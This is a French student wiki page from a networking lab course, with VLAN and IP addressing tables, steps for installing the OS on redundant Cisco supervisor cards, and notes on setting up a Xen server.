[[Fichier:Architecture-MA2a5-2020_2021.JPG]]

=== Architecture matérielle Réelle ===

Ainsi, grâce à cette configuration, il y aurait eu de la redondance entre les cartes de supervision et les autres éléments. De ce fait, si une des cartes de supervision était défectueuse, la seconde pourrait toujours communiquer avec le reste du système. Cependant, afin de se partager le matériel avec la seconde classe, nous ne pouvions utiliser que la moitié de la fibre mise à disposition. De ce fait, nous avons abouti à la configuration suivante :

[[Fichier:Architecture2-MA2a5-2020_2021.JPG]]

=== Architecture Réseau ===

[[Fichier:Architecture-Reseau-MA2a5-2020_2021.JPG]]

== Table d'adressage IP ==

=== Table du vlan1 ===

{| class="wikitable"
!Nom de l'appareil !! IP
|-
|6509
|10.60.0.1
|-
|3560 E
|10.60.0.2
|-
|Mask
|255.255.255.0
|}

=== Table du vlan2 ===

{| class="wikitable"
!Nom de l'appareil !! IP !! nom VM
|-
|6509
|193.48.57.161
|X
|-
|3560 E
|193.48.57.162
|X
|-
|routeur virtuel
|193.48.57.163
|X
|-
|Lionel
|193.48.57.164
|Rafale
|-
|Guillaume
|193.48.57.165
|Concorde
|-
|Samuel
|193.48.57.166
|Blackbird
|-
|Thibaut
|193.48.57.167
|Falcon
|-
|Alexandre
|193.48.57.168
|Mirage
|-
|Thomas
|193.48.57.169
|Alpha_jet
|-
|Crispin
|193.48.57.170
|NightHawk
|-
|Léna
|193.48.57.171
|hawker
|-
|Nathan
|193.48.57.172
|Boeing
|-
|ISR
|193.48.57.173/28
|X
|-
|Mask
|255.255.255.240
|X
|-
|}

=== Table du vlan130 ===
{| class="wikitable"
!Nom de l'appareil !! IP
|-
|6509
|192.168.222.2
|-
|3560 E
|192.168.222.1
|-
|Mask
|255.255.255.248
|}

=== Table des vlan ===

{| class="wikitable"
!Nom !! Vlan
|-
|Lionel
|Vlan3
|-
|Guillaume
|Vlan4
|-
|Samuel
|Vlan5
|-
|Thibaut
|Vlan6
|-
|Alexandre
|Vlan7
|-
|Thomas
|Vlan8
|-
|Crispin
|Vlan9
|-
|Léna
|Vlan10
|-
|Nathan
|Vlan11
|-
|}

=== Table générale ===

{| class="wikitable"
! Nom !! Vlan !! Réseau IPV4 !! Réseau IPV6 !! IP Routeur 1 !! IP Routeur 2 !! IP Routeur Virtuel
|-
|Administration
|Vlan1
|10.60.0.0/24
|
|10.60.0.1
|10.60.0.2
|
|-
|Xen
|Vlan2
|193.48.57.160/28
|2001:660:4401:60a2::0/64
|193.48.57.161
|193.48.57.162
|193.48.57.163
|-
|Groupe 1
|X
|X
|X
|X
|X
|X
|-
|Groupe 2
|X
|X
|X
|X
|X
|X
|-
|Groupe 3
|X
|X
|X
|X
|X
|X
|-
|Groupe 4
|X
|X
|X
|X
|X
|X
|-
|Groupe 5
|Vlan7
|193.48.57.168/24
|X
|X
|X
|X
|-
|Groupe 6
|X
|X
|X
|X
|X
|X
|-
|Groupe 7
|Vlan10
|10.60.7.0/24
|2001:660:4401:60aa::0/64
|10.60.7.1
|10.60.7.2
|10.60.7.3
|-
|Groupe 8
|Vlan11
|X
|2001:660:4401:60a2::4/64
|X
|X
|X
|-
|Groupe 9
|X
|X
|X
|X
|X
|X
|-
|Interconnexion
|X
|X
|Router1 : X // Router2 : X // Ecole : X
|X
|X
|
|-
|}

=== IP des VMs ===

{| class="wikitable"
!Nom de la VM !! IP de la VM
|-
|mirage
|193.48.57.168/28
|-
|X
|X
|-
|X
|X
|-
|X
|X
|-
|X
|X
|-
|X
|X
|-
|X
|X
|-
|X
|X
|-
|X
|X
|-
|X
|X
|-
|}

=== Cartes de supervision ===

Problématique: Configuration et installation des OS des cartes de supervision

Etape 1: Vérifier l'existence d'OS sur les deux cartes.

Pour cela, nous avons utilisé le port console grâce à une liaison série sur un PC. Ainsi, nous avons utilisé l'interface minicom pour nous connecter aux cartes.
-> 1ere carte: OS présent. Réaction suite à la commande boot et différents OS trouvés (3)
-> 2ème carte: OS absent

Etape 2: Copie du fichier d'OS

[[Fichier:TP sysres IMA2a5 2020/2021 - Carte Supervision 1.jpg]]

Grâce à l'emplacement en façade pour les cartes flash, nous avons pu copier le fichier d'OS de la première carte de supervision vers l'autre. Puis, il nous a suffit de replacer la carte flash dans la deuxième carte de supervision.

copy sup-bootdisk:/sys/s72033/base/s72033-ipservicesk9_wan-mz.&éé-33.SXI6.bin disk0:

Etape 3: Reboot de la deuxième carte

Pour s'assurer du bon fonctionnement de la deuxième carte, nous l'avons redémarrer (boot) avec l'OS à l'intérieur.

boot
sh ver

Etape 4: Vérification de la redondance

La carte principale de supervision est active alors que la deuxième est en standby. La première carte bootée est la carte active

== Configuration machine Xen sur Capbreton ==

- Connexion de l'écran, clavier, souris sur le serveur
- Commande "lbslk" permettant de voir les partitions sur la machine
Il y a 2 disques de 500go qui forme un volume répartie de la façon suivante : 900Go pour Xen et 100Go pour le système.
Il y a 1 disque SDA avec 800go de libre.
Deux disques plus lent sont utilisé pour LVM.
- On souhaite déplacer les disques présent dans l'ancien serveur vers le serveur Capbreton cependant il faut s'assurer que les berceaux sont les même.
Dans notre cas les berceaux ne sont pas les mêmes nous n'avons pas pu les insérer

Concernant le brigde, nous avons vu dans /etc/network/interfaces "brigde_ports eth1 eth7". Nous devons connecter eth1 et eth7. Pour connaître où sont les interfaces sur le serveur nous avons utilisé la commande:
ethtool -p eth7
ethtool -p eth1

On a pu constater que eth7 correspond à la connexion en fibre optique et eth1 est la connexion cuivre